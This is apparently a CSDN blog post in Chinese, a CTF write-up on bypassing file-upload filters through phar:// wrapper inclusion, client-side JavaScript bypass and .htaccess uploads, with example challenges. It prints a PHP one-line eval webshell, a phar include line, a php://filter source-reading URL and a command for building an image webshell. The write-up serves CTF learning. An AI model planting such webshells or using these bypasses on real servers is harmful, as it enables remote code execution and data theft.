文件上传的相关知识

最新推荐文章于 2024-09-23 20:12:37 发布
最新推荐文章于 2024-09-23 20:12:37 发布
阅读量128 收藏 1
点赞数
分类专栏: ctf 文章标签: 信息安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_49977939/article/details/112865711
版权

最近刷了几道文件上传的题,其中包括 js 绕过、.htaccess 上传、phar 绕过,文件上传的题
目一般都是黑盒,白盒审计很少,奇奇怪怪的东西还是挺多的。就我自己来说,做这种题一
般都是各种都试试,基本上都能出来。

姿势一:Phar 绕过上传限制
在这里插入图片描述

进行压缩,之后把 rar 的后缀名改成 jpeg 格式
首先我们在本地测试一下:
首先准备一句话木马
test.php

<?php @eval($_POST["cmd"]);?>

index.php

<?php include('phar://./test.jpg/test.php'); ?>

在这里插入图片描述

可以看到,是可以执行的。
安恒月赛:image_up
首先我们把源码读出来:
这里是利用伪协议读取源码
/index.php?page=php://filter/read=convert.base64-encode/resource=
index.php
在这里插入图片描述
login.php
在这里插入图片描述

upload.php
在这里插入图片描述

在这里插入图片描述

这道题就是利用 phar 伪协议去包含我们写好的一句话
具体做法: 木马文件打包成压缩包,然后改后缀,再利用 phar 伪协议读取
phar://./uploads/4h214215521321.jpg/1
最后用蚁剑链接就可以拿到 flag

姿势二:js 绕过
在这里插入图片描述


查看源码之后发现文件上传,图片马
先来做一个吧
合成图片马的命令:copy 1.png /b + 1.txt /a 2.png

在这里插入图片描述

我们先来上传一个一句话木马吧,
在这里插入图片描述

这里发现是能够上传成功的,但是不解析,最后利用 JS 绕过
payload:

利用 file 读取上传的文件,发现是解析 php 文件的

在这里插入图片描述

查看文件名发现有 flag 相关文件,直接读就出
在这里插入图片描述

例题二:[GXYCTF2019]BabyUpload
在这里插入图片描述

js 绕过:
在这里插入图片描述
合成图片马:
直接上传蚁剑连接
在这里插入图片描述

姿势三:.htaccess 上 传
文件上传这种题,一般都是一把梭,这道题考察点是 后端验证+.htaccess 文件上传
在这里插入图片描述

在这里插入图片描述
我们把 content-type 改成 image/jpeg 格式在这里插入图片描述

发现上传成功,下一步就是传图片马
在这里插入图片描述

permeation
关注
专栏目录
asp.net下大文件上传知识整理
10-31
ASP.NET 下的大文件上传涉及到多个技术点,包括HTTP协议、HTML表单、MIME类型以及服务器端的处理策略。在本文中,我们将深入探讨这些关键知识...通过理解这些知识点并正确应用,你可以构建出安全、高效的文件上传系统。
有关文件上传知识点(一)
fmmmmmm的博客
04-17 118
自动验证:前段会有一部分对表单的验证操作(通过JavaScript),但是javascrip有些情况下是不好用的(例如禁用就JavaScript)。因此后端也需要有一套类似的操作,弄够在后端实现能够对用户提供的数据进行验证,这个就是后端的自行验证。 准备工作 ...
Vuejs文件上传组件多文件上传
08-10
本篇将详细介绍Vue.js中实现多文件上传相关知识点,以及如何使用`vue-upload-component`这个开源组件来帮助我们实现这一功能。 首先,文件上传组件通常需要处理以下几个关键点: 1. **多文件选择**:用户可能...
FAQ.rar_PHP 文件管理_知识管理
09-19
标题“FAQ.rar”是一个压缩包文件,主要涵盖了PHP文件管理和知识管理的相关内容。这个系统旨在帮助个人有效地管理和组织他们的知识,特别是通过FAQ(常见问题解答)的形式。在描述中提到,该系统包含了FAQ管理和文件...
最新临时文件上传存储分享系统,临时文件网盘系统源码
02-01
该系统主要是一个基于...总之,这个临时文件上传存储分享系统是一个结合了前端交互、后端处理、文件存储和分享功能的综合平台,涉及到了Web开发的多个技术层面,包括前端、后端、数据库、安全和性能优化等方面的知识
Contact Form 7最新5.9.8版错误修复方案
jianzhanyes的博客
09-18 311
Contact Form 7最新5.9.8版错误修复
CTFShow-反序列化
qq_66013948的博客
09-17 1087
private变量会被序列化为:\x00类名\x00变量名protected变量会被序列化为: \x00*\x00变量名public变量会被序列化为:变量名__sleep() //在对象被序列化之前运行 *__wakeup() //将在反序列化之后立即调用(当反序列化时变量个数与实际不符是会绕过) *如果类中同时定义了 __unserialize() 和 __wakeup() 两个魔术方法, 则只有 __unserialize() 方法会生效,
玄机靶场--蚁剑流量
m0_75046593的博客
09-23 201
第一特征蚁剑的请求包加密,返回包以明文形式传输第二特征http头中存在init_set字段并且content-type是urlencoded。
以题为例浅谈反序列化漏洞
最新发布
weixin_74427106的博客
09-23 384
序列化是将对象的状态信息转换为可以存储或传输的形式的过程,在序列化期间,对象将当前状态写入到临时或持久性存储区。以后,可以通过从存储区中读取或反序列化对象状态,重新创建该对象。反序列化与此相反;简单来说就是序列化就是把对象转为字节序列的过程称为对象的序列化,反序列化就是将字节序列恢复为对象的过程称为对象的反序列化;
【网络安全 | 代码审计】PHP无参数RCE
等风来
09-17 827
一般情况下,RCE需要通过传递特定的输入(如URL参数、POST请求数据、表单数据等)来触发漏洞并执行恶意代码。而无参数RCE是一种特殊的远程代码执行漏洞,它的特点是通过调用多个函数(或利用系统中已有的代码路径)来实现远程代码执行,而无需显式的参数。
BGP相关知识笔记
Richardlygo的博客
09-23 940
整个网络规模扩大,路由数量进一步增加,路由表与LSDB规模变大,路由收敛变慢,设备性能消耗加大为此在AS之间专门使用BGP协议进行路由传递,相较于传统的IGP路由协议:BGP基于TCP,只要能够建立TCP连接即可建立BGP只传递路由信息,不会暴露AS内的拓扑3。
微信支付开发-后台统计工厂实现
龙哥·三年风水从2011年开始做IT工作,从ps画图到前端开发->后端开发->框架开发->业务架构设计及开发->业务需求整理、开发->技术经理->技术总监
09-17 671
微信支付开发-后台统计工厂实现-thinkphp6+MySQL5.7
VulnHub-Bilu_b0x靶机笔记
LINGX5的博客
09-19 1147
Billu_b0x.zip 靶机是Vulnhub 的一个靶机,包含了 sql 注入,文件包含,代码审计,内核提权。整体也是比较简单的内容,和大家一起学习
快递预约取件API接口DEMO下载
KuaiDNiao的博客
09-23 81
预约取件API为用户提供了在线下单,预约快递员上门揽件的功能,为用户解决在线发货需求。现已支持快递、快运业务,同城配业务即将上线。已覆盖国内主流物流公司,更多公司持续接入入中。预约取件接口Demo工具.NODE.JS版。预约取件接口Demo工具.PYTHON版。预约取件接口Demo工具.JAVA版。预约取件接口Demo工具.PHP版。预约取件接口Demo工具.GO版。
最新简洁大方的自动发卡网站源码/鲸发卡v11.61系统源码/修复版
sqll567的博客
09-18 541
最新简洁大方的自动发卡网站源码,它就是鲸发卡v11.61系统源码,它是修复版。说到鲸发卡系统,鲸发卡系统在发卡圈很多人都知道的,它是市面最好发卡系统之一,操作起来简单得很,界面也是一看就会的那种。而且啊,它的主页UI已经全新升级了,绝对不是那种满大街都是的普通首页哦!我们给它换上了三套全新的模板,市面上那些所谓的11.61版本其实就是这个,只是换了个版本号,加了个新模板。这个稳定的发卡源码鲸发卡11.61修复版,目前还没发现有啥问题。
Kubernetes从零到精通(11-CNI网络插件)
fzw1030的博客
09-18 1645
Flannel是一种简单易用的Kubernetes网络插件,专注于为Kubernetes提供容器网络解决方案。它的主要作用是为Kubernetes集群中的Pod提供跨主机的网络连接,允许不同节点上的Pod能够互相通信。Flannel是一种覆盖网络(overlay network)实现,底层依赖于封装(encapsulation)技术来跨越不同节点的网络边界。Calico是一种广泛使用的Kubernetes网络插件,主要用于提供容器网络和网络安全策略。
如何在WordPress中添加事件Schema(分步指南)
2401_87032782的博客
09-19 1396
如果你正在举办一个在线活动,那么你可能正在寻找通过网络宣传的方法。此时,模式标记可以帮助你在搜索引擎结果中提高活动的可见性。活动模式将帮助谷歌和其他搜索引擎更好地理解你的活动详情,使它们能够在活动列表、丰富摘要和谷歌知识面板中展示你的活动,吸引更多的受众。在本文中,我们将向你展示如何在WordPress中添加活动模式来提升你的排名。
PHP邮箱系统:从入门到实战搭建教程指南!
danplus的博客
09-18 608
无论是用于企业内部沟通,还是用于个人项目,PHP邮箱系统都能为你提供强大的邮件管理功能。AokSend,强化PHP邮箱系统,融合API与SMTP接口,构建高效稳定的邮件服务平台,沟通无界!
PHP文件上传教程:多文件实例
以下是对标题和描述中涉及的PHP文件上传知识点的详细说明: 1. 表单设置: 文件上传需要在HTML表单中包含`enctype="multipart/form-data"`属性,这是为了支持二进制数据(如文件)的传输。此外,表单的`method`应...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值